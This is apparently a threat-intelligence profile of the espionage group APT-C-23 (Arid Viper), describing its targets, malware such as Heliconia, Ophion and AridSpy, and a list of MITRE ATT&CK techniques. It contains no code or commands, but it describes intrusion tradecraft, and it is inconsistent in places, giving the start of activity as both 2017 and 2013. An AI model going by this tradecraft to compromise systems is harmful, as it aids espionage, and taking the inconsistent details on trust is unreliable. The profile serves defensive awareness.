APT-C-23 | |
Other Names | Arid Viper |
Date of initial activity | 2017 |
Motivation | Cyberwarfare |
Associated Tools | Heliconia Ophion Saidot Powershell-based Tools |
Software | Windows |
Overview
APT-C-23, also known as Arid Viper, Desert Falcons, or Two-tailed Scorpion, is a prominent Advanced Persistent Threat (APT) group known for its sophisticated cyber espionage operations. Since its emergence in 2013, APT-C-23 has established a reputation for targeting high-value entities across the Middle East, with a particular focus on countries such as Egypt and Palestine. The group’s operations are marked by their use of advanced malware and complex attack vectors, which often include social engineering and the exploitation of vulnerabilities in popular applications.
APT-C-23’s activities are characterized by their multi-stage attack methodologies and the deployment of customized malware tailored to specific operational objectives. One of the group’s notable malware families is AridSpy, a sophisticated Android spyware that exemplifies APT-C-23’s approach to espionage. AridSpy, like other tools used by APT-C-23, is designed to evade detection and exfiltrate sensitive information from targeted devices. The group’s tactics typically involve creating trojanized versions of legitimate applications, which are then distributed through deceptive channels to lure victims into installing the malicious software.
The group’s operations have evolved over time, with recent campaigns showcasing their ability to adapt and refine their techniques. APT-C-23 has demonstrated an extensive arsenal of malware that spans various platforms, including Android, iOS, and Windows. This versatility allows them to conduct broad and persistent surveillance operations, making them a formidable threat actor in the cyber landscape. Their focus on specific geopolitical regions and the use of sophisticated cyber tools underscore the strategic nature of their campaigns, highlighting the significant challenges faced by organizations and individuals in the affected regions.
Common Targets
Public Administration
Individuals of Palestine and Egypt
Attack vectors
Phishing
Web Browsing
How they work
At the core of APT-C-23’s operations are a variety of custom remote access tools (RATs) such as Heliconia and Ophion. These tools enable the threat actor to maintain persistent access to compromised systems, facilitate remote control, and perform extensive data collection. Heliconia, for instance, provides the ability to remotely execute commands, capture keystrokes, and manipulate files, all while evading detection mechanisms. Ophion, another RAT in their arsenal, offers advanced functionalities including system monitoring, file management, and keylogging, which allows APT-C-23 to gather extensive intelligence from infected machines. These RATs are carefully engineered to blend in with legitimate system processes, making them difficult to detect and analyze by conventional security solutions.
APT-C-23’s technical operations also include the deployment of sophisticated exfiltration tools. These tools are designed to securely transmit stolen data from compromised systems to the attackers’ command and control infrastructure. The group employs custom exfiltration methods to avoid detection and to ensure the integrity and confidentiality of the data being transferred. By using encrypted communication channels and disguising their data traffic as legitimate network activity, APT-C-23 minimizes the risk of interception and maintains the stealth of their operations.
In addition to custom tools, APT-C-23 leverages well-known utilities such as Mimikatz and Metasploit Framework. Mimikatz is used for credential dumping, enabling the extraction of sensitive authentication information from compromised systems. This tool is crucial for escalating privileges and moving laterally within a network. Metasploit Framework, on the other hand, is used for exploitation and post-exploitation activities. It allows APT-C-23 to create custom payloads and execute a variety of exploits to compromise additional systems and establish footholds in the target environment.
The technical sophistication of APT-C-23 is further demonstrated through their use of PowerShell-based tools and scripts. PowerShell, a powerful scripting language, is utilized for executing commands, automating tasks, and establishing persistence. APT-C-23’s use of PowerShell highlights their capability to exploit built-in system tools for malicious purposes, often bypassing traditional security controls designed to detect such activities.
MITRE Tactics and Techniques
Initial Access:
Spear Phishing (T1566): APT-C-23 often uses spear-phishing emails with malicious attachments or links to gain initial access to targeted systems.
Drive-by Compromise (T1189): They may exploit compromised websites to deliver malicious payloads to visitors.
Execution:
Command and Scripting Interpreter (T1059): APT-C-23 uses scripting languages, such as PowerShell or JavaScript, to execute commands on compromised systems.
Malicious File (T1203): They may use specially crafted files that exploit vulnerabilities in applications to execute malicious code.
Persistence:
Registry Run Keys / Startup Folder (T1547.001): The group may create or modify registry keys to ensure their malware is executed upon system startup.
Create or Modify System Process (T1543): They might alter system processes or create new ones to maintain persistence on the compromised systems.
Privilege Escalation:
Exploitation of Vulnerability (T1203): APT-C-23 exploits vulnerabilities to elevate their privileges within the system.
Bypass User Account Control (T1088): They may use techniques to bypass UAC and gain higher levels of access.
Defense Evasion:
Obfuscated Files or Information (T1027): They use various obfuscation techniques to hide their malicious payloads and activities.
Code Signing (T1116): The group may use code signing certificates to make their malicious executables appear legitimate.
Credential Access:
Credential Dumping (T1003): APT-C-23 may use tools to extract credentials from the target system.
Brute Force (T1110): They might employ brute-force techniques to guess passwords and gain unauthorized access.
Discovery:
Network Service Scanning (T1046): The group performs scanning of network services to identify potential targets and vulnerabilities.
System Information Discovery (T1082): They gather information about the system to better understand the environment they are operating in.
Lateral Movement:
Remote Desktop Protocol (T1076): They may use RDP to move laterally across the network and access other systems.
Windows Admin Shares (T1077): They might utilize administrative shares to move between systems on the network.
Collection:
Data Staged (T1074): APT-C-23 may stage data before exfiltrating it to ensure the exfiltration process is efficient and stealthy.
Screen Capture (T1113): They might capture screenshots to gather sensitive information from the compromised systems.
Exfiltration:
Exfiltration Over Command and Control Channel (T1041): APT-C-23 often exfiltrates data over the same channels used for command and control, avoiding detection.
Impact:
Data Destruction (T1485): In some cases, they might destroy data on compromised systems as part of their operational impact.